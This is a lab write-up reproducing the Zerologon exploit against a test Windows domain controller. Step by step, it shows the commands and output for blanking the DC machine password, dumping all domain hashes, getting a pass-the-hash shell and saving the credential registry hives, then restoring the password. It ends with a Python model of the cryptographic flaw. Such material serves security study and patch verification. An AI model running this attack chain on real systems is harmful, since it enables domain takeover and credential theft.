CVE-2020-1472 (Zerologon) domain controller reproduction

With this vulnerability, anyone who can merely open a TCP connection to the domain controller can, in practice, take it over.

Secura writes in the vulnerability whitepaper:

The only thing an attacker needs for that is the ability to set up TCP connections with a vulnerable DC.

Affected versions:

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

Domain lab setup

DC: Windows Server 2008 R2

  • Domain computer name: DC
  • Domain name: yyz.com
  • Password: xy10xy10
  • Directory Services Restore Mode Administrator password: Xy10xy10
  • Domain user login / password: testuser / Xy10xy10

Domain member: Windows 7

  • Computer name: win7
  • Domain member name: win7
  • Password: xy10xy10

Tools: Kali

Reproduction steps

First, gather some information about the DC's open ports:

┌──(kali㉿kali)-[~]
└─$ nmap -sV 192.168.112.135
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-16 02:41 EST
Nmap scan report for 192.168.112.135
Host is up (0.00038s latency).
Not shown: 983 closed ports
PORT     STATE SERVICE     VERSION
53/tcp   open domain       Microsoft DNS 6.1.7601 (1DB1446A) (Windows Server 2008 R2 SP1)
88/tcp   open kerberos-sec Microsoft Windows Kerberos (server time: 2021-02-16 07:41:41Z)
135/tcp   open msrpc       Microsoft Windows RPC
139/tcp   open netbios-ssn Microsoft Windows netbios-ssn
389/tcp   open ldap         Microsoft Windows Active Directory LDAP (Domain: yyz.com, Site: Default-First-Site-Name)
445/tcp   open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: YYZ)
464/tcp   open kpasswd5?
593/tcp   open ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open tcpwrapped
3268/tcp open ldap         Microsoft Windows Active Directory LDAP (Domain: yyz.com, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc       Microsoft Windows RPC
49153/tcp open msrpc       Microsoft Windows RPC
49154/tcp open msrpc       Microsoft Windows RPC
49155/tcp open msrpc       Microsoft Windows RPC
49156/tcp open msrpc       Microsoft Windows RPC
49158/tcp open ncacn_http   Microsoft Windows RPC over HTTP 1.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.84 seconds

The open ports are the services a domain controller exposes: DNS (53), Kerberos (88, 464), LDAP/Global Catalog (389, 636, 3268, 3269), SMB (139, 445) and RPC (135 plus the dynamic 49152+ range). Zerologon only needs the Netlogon RPC interface (MS-NRPC), which the tools below reach through the endpoint mapper on 135 and one of those dynamic ports.

Vulnerability verification

git clone https://github.com/SecuraBV/CVE-2020-1472
cd CVE-2020-1472
pip install -r requirements.txt
python3 zerologon_tester.py DC 192.168.112.135
(python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDR)

Response (each "=" is one authentication attempt; on average about 256 are needed):

Performing authentication attempts...
===================================================================================================================================================================================================================================================================================================================================================================
Success! DC can be fully compromised by a Zerologon attack.

Understanding the exploitation flow

  1. Abuse the Netlogon authentication bypass to set the DC machine account (DC$) password stored in AD to an empty string.
  2. Authenticate as DC$ with the now-empty password and dump the domain hashes out of NTDS.DIT over DRSUAPI.
  3. Pass the Administrator NT hash to get a shell on the DC, then export the local SYSTEM/SAM/SECURITY hives, which still hold the DC's original machine-account password in the LSA secret $MACHINE.ACC.
  4. Use that original password to put the DC$ password back, so the copy in AD and the DC's own local copy agree again (while they differ, the DC's own Netlogon channel and replication break, so do not skip this step).

Tools and environment setup

Install Impacket

git clone https://github.com/SecureAuthCorp/impacket
cd impacket
pip install .

The python3 on my Kali box had no pip, so I spent ages installing pip and ran into all sorts of problems along the way; a Baidu search solves them!

Download the exploit

cd examples
git clone https://github.com/dirkjanm/CVE-2020-1472
cd CVE-2020-1472

Start the attack

Blank the password

python3 cve-2020-1472-exploit.py DC 192.168.112.135
(python3 cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR)

Response:

Performing authentication attempts...
===============================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

At this point the DC$ password in AD is blank.

Dump the hashes

cd ..
python3 secretsdump.py yyz.com/DC\$@192.168.112.135 -just-dc -no-pass
(python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass)

On Windows the escape is not needed: python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -just-dc -no-pass

Response:

Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c1388c1a084a2193daaab5189da11ac7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:37955e8242bb9ce29473b4730c5febd6:::
yyz.com\testuser:1105:aad3b435b51404eeaad3b435b51404ee:6b735b12efb7a81d0c1f6404b7a211b0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN7$:1103:aad3b435b51404eeaad3b435b51404ee:21bced4a1619c61fcb4428d870af010b:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:a23943a21ebce9be9a37423ac279bf9a70a16d6eb6720b3dd6127795050fd94a
krbtgt:aes128-cts-hmac-sha1-96:fab1d35530c4a04b8063229bdcd86bb4
krbtgt:des-cbc-md5:a8238af7b634ae3d
yyz.com\testuser:aes256-cts-hmac-sha1-96:2d77a4c4fee83a92e760f82d57e8101dc79d344d088b387d080844cd4565e2d8
yyz.com\testuser:aes128-cts-hmac-sha1-96:68bed6a927b09d2b967cf48a27776e36
yyz.com\testuser:des-cbc-md5:ae3e13945ed91acb
DC$:aes256-cts-hmac-sha1-96:c99341602dfa4f554504a4e810bf8425da82a684d9a6fe70599b231d28c42d15
DC$:aes128-cts-hmac-sha1-96:70c750f9fd52913be61c827081b5dbeb
DC$:des-cbc-md5:2f08730d62e5dc8a
WIN7$:aes256-cts-hmac-sha1-96:922840da3c393fdcb0862ce5b0336610f3c4e43c624b2dcfb051c3ccda3eaef0
WIN7$:aes128-cts-hmac-sha1-96:0aa4910c55c8ee6be060fe750b97ced5
WIN7$:des-cbc-md5:dc31d352a183f8c2
[*] Cleaning up...

Get a shell

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c1388c1a084a2193daaab5189da11ac7 yyz.com/Administrator@192.168.112.135
(python3 wmiexec.py -hashes <HASH> DOMAIN/DOMAIN_USER@DC_IP_ADDR)

Sure enough, we get a shell. The dir output comes out garbled because the target is a Chinese-locale Windows (code page 936) and wmiexec.py decodes it as UTF-8; rerunning with -codec gbk, as the tool's own hint suggests, renders it correctly:

Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dir
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
 Volume in drive C has no label.
 Volume Serial Number is BA52-5A9F

 Directory of C:\

2009/07/14 11:20   <DIR>         PerfLogs
2021/02/16 09:58   <DIR>         Program Files
2021/02/16 09:18   <DIR>         Program Files (x86)
2021/02/16 12:07   <DIR>         Users
2021/02/16 15:51   <DIR>         Windows
              0 File(s)              0 bytes
              5 Dir(s)  32,107,630,592 bytes free

C:\>

Recover the original hash

Run the following in the shell (save the hives, pull them back with wmiexec's get command, then delete the copies from the DC):

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

Parse the hashes

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Response:

Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0xe72b35f79ed7c4b89042556952e0d1ea
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6b735b12efb7a81d0c1f6404b7a211b0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:e6cf9dd894e67eb777e686bca16f2e73292a19a98c7c6506b1ccce7bcc4bd7086b721236c47da36dba37ffa23feb3a65613688b7d65deb1d1aa5acf4c7cd45ab660fbfaaa7ebcf37380f298e536ea99b337d31405225bf5debd622a5b7214032720c927173e8ea20cc159a3d7339a501c2f215aa70e1f43ca39886e888fed441315134c60cb38257784a3369e64eebb718c5fd8713763403210d10c78a31d9dc88865ee02127df0461a0a814f911863bdcd7137719ad3ef4b1aa9329054ba44b5cf407b7450ff1c4ec6fcd2f207aa094dbeb94ec019fb503dde67cae3052008d7f8d62540250036657dbda3e6423dea1
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:5d1f5cee1e8a8f5a9e0f5d0013032f46
[*] DefaultPassword
(Unknown User):xy10xy10
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1f3654ef94595af34c117f3e9980eac240b67890
dpapi_userkey:0x85887ea640e44b7cbb72520c62572acc32c8d8cf
[*] NL$KM
0000   EA D0 32 F5 3E CF C2 18 1C 58 31 82 ED 06 1D EE   ..2.>....X1.....
0010   82 24 BE 41 6E 05 AD 9D DF 1B 12 80 FC 86 3C D8   .$.An.........<.
0020   7B EC C1 F0 07 19 8B F7 03 11 F7 97 7D 03 E4 57   {...........}..W
0030   7B F6 24 03 2B C6 8F 46 9F BE 6E A1 42 67 C0 BE   {.$.+..F..n.Bg..
NL$KM:ead032f53ecfc2181c583182ed061dee8224be416e05ad9ddf1b1280fc863cd87becc1f007198bf70311f7977d03e4577bf624032bc68f469fbe6ea14267c0be
[*] Cleaning up...

Of the $MACHINE.ACC lines just above DefaultPassword, the plain_password_hex value (the machine account's raw password, hex encoded) is what the restore script needs in the next step; the NT hash on the line after it, 5d1f5cee1e8a8f5a9e0f5d0013032f46, is what DC$ should show again once the restore has worked.

Restore the password

git clone https://github.com/risksense/zerologon
cd zerologon
python3 reinstall_original_pw.py DC 192.168.112.135 e6cf9dd894e67eb777e686bca16f2e73292a19a98c7c6506b1ccce7bcc4bd7086b721236c47da36dba37ffa23feb3a65613688b7d65deb1d1aa5acf4c7cd45ab660fbfaaa7ebcf37380f298e536ea99b337d31405225bf5debd622a5b7214032720c927173e8ea20cc159a3d7339a501c2f215aa70e1f43ca39886e888fed441315134c60cb38257784a3369e64eebb718c5fd8713763403210d10c78a31d9dc88865ee02127df0461a0a814f911863bdcd7137719ad3ef4b1aa9329054ba44b5cf407b7450ff1c4ec6fcd2f207aa094dbeb94ec019fb503dde67cae3052008d7f8d62540250036657dbda3e6423dea1
(python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>)

Success:

Performing authentication attempts...
==================================================================================================
NetrServerAuthenticate3Response
ServerCredential:              
  Data:                           b'(\xae\xe5N\xa1\xe1\x9e{'
NegotiateFlags:                 556793855
AccountRid:                     1000
ErrorCode:                       0


server challenge b'(\xc3f\x0fo\xcf\xf6?'
session key b'\xa8\xf8\xae\xd2\xcfNW\x0fx\xeb\x9f5\xe2\xcc\x12\x9e'
NetrServerPasswordSetResponse
ReturnAuthenticator:            
  Credential:                    
      Data:                           b'\x01\x0c\xf0\xab$\xf3\x89\x8e'
  Timestamp:                       0
ErrorCode:                       0



Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.

Check whether it was restored

python3 secretsdump.py yyz.com/DC\$@192.168.112.135 -just-dc -no-pass

In this dump DC$ should no longer show 31d6cfe0d16ae931b73c59d7e0c089c0 (the NT hash of an empty password) but 5d1f5cee1e8a8f5a9e0f5d0013032f46, the $MACHINE.ACC hash recovered from the registry hives; every other account is unchanged from the earlier dump.

That completes the reproduction of the vulnerability!

Vulnerability details and principle

https://www.secura.com/uploads/whitepapers/Zerologon.pdf

I honestly can't make sense of it...
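The core of the whitepaper, as an added illustration (not code from this post, Secura or Impacket): Netlogon's ComputeNetlogonCredential encrypts the 8-byte challenge with AES-128 in CFB8 mode using a fixed all-zero IV. In CFB8 each output byte is the plaintext byte XOR the first byte of one block-cipher call on a shift register, and that ciphertext byte is then shifted into the register. Start with a zero IV and an all-zero client challenge, and whenever the first byte of E(key, 0) happens to be zero the register never changes, so all eight credential bytes are zero. That holds for roughly 1 in 256 session keys, which is why the tester and the exploit simply retry with a zero challenge and a zero credential until the DC accepts one (the row of "=" signs in their output). The model below uses real AES through the pyca cryptography package when it is installed and otherwise falls back to a SHA-256 based stand-in, which is an assumption of this example: the 1/256 argument only needs the first output byte to be roughly uniform.

```python
"""Model of the Netlogon credential flaw behind Zerologon (CVE-2020-1472)."""
import hashlib
import secrets

try:
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def block_encrypt(key: bytes, block: bytes) -> bytes:
        """Single-block AES-128 (ECB on exactly one block)."""
        enc = Cipher(algorithms.AES(key), modes.ECB(), backend=default_backend()).encryptor()
        return enc.update(block) + enc.finalize()

    BACKEND = "AES-128 (pyca cryptography)"
except ImportError:
    # Assumption of this example: without pyca cryptography a keyed hash stands in
    # for AES. The 1/256 property only needs a roughly uniform first output byte.
    def block_encrypt(key: bytes, block: bytes) -> bytes:
        return hashlib.sha256(key + block).digest()[:16]

    BACKEND = "SHA-256 stand-in (not AES)"

BLOCK = 16
ZERO_IV = bytes(BLOCK)
ZERO_CHALLENGE = bytes(8)


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Generic CFB8: one block-cipher call and one byte of feedback per plaintext byte."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, bytes(register))[0]
        out.append(c)
        register = register[1:] + bytes([c])  # shift the ciphertext byte into the register
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """Netlogon's credential: CFB8 over the challenge with the IV hard-wired to zero."""
    return cfb8_encrypt(session_key, ZERO_IV, challenge)


def zero_credential_accepted(session_key: bytes) -> bool:
    """True when an all-zero credential is valid for an all-zero client challenge."""
    return compute_netlogon_credential(session_key, ZERO_CHALLENGE) == ZERO_CHALLENGE


def first_byte_is_zero(session_key: bytes) -> bool:
    """The whole property collapses to one byte of one block-cipher call."""
    return block_encrypt(session_key, ZERO_IV)[0] == 0


def attack_attempts(max_attempts: int = 2000, keygen=secrets.token_bytes) -> int:
    """Attacker loop: every NetrServerAuthenticate3 attempt sees a fresh session key
    (the DC derives it from its secret plus both challenges, which we cannot predict).
    Returns the number of attempts needed, or -1 if the budget ran out (~0.04% at 2000)."""
    for attempt in range(1, max_attempts + 1):
        if zero_credential_accepted(keygen(16)):
            return attempt
    return -1


def bypass_rate(sample: int = 4096) -> float:
    """Fraction of the deterministic keys 0..sample-1 that accept the zero credential."""
    hits = sum(zero_credential_accepted(i.to_bytes(BLOCK, "big")) for i in range(sample))
    return hits / sample


def first_vulnerable_key(start: int = 0) -> bytes:
    """Deterministically find a session key that accepts the zero credential."""
    i = start
    while not zero_credential_accepted(i.to_bytes(BLOCK, "big")):
        i += 1
    return i.to_bytes(BLOCK, "big")


if __name__ == "__main__":
    print("block cipher:", BACKEND)
    print("attempts until the DC accepts an all-zero credential:", attack_attempts())
    print(f"fraction of keys affected: {bypass_rate():.4f} (expected ~1/256 = 0.0039)")
    key = first_vulnerable_key()
    print("vulnerable key:", key.hex(),
          "credential:", compute_netlogon_credential(key, ZERO_CHALLENGE).hex())
```

Two things the model makes visible. First, the attacker never learns the session key: it just needs one of the ~256 attempts to land on a key whose first keystream byte is zero, which is the "=" progress bar in the tester. Second, the same all-zero credential then signs the NetrServerPasswordSet2 call (with the flags value 0x212FFFFF, 556793855 in the output above, that disables signing and sealing), which is how the DC$ password ends up empty.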
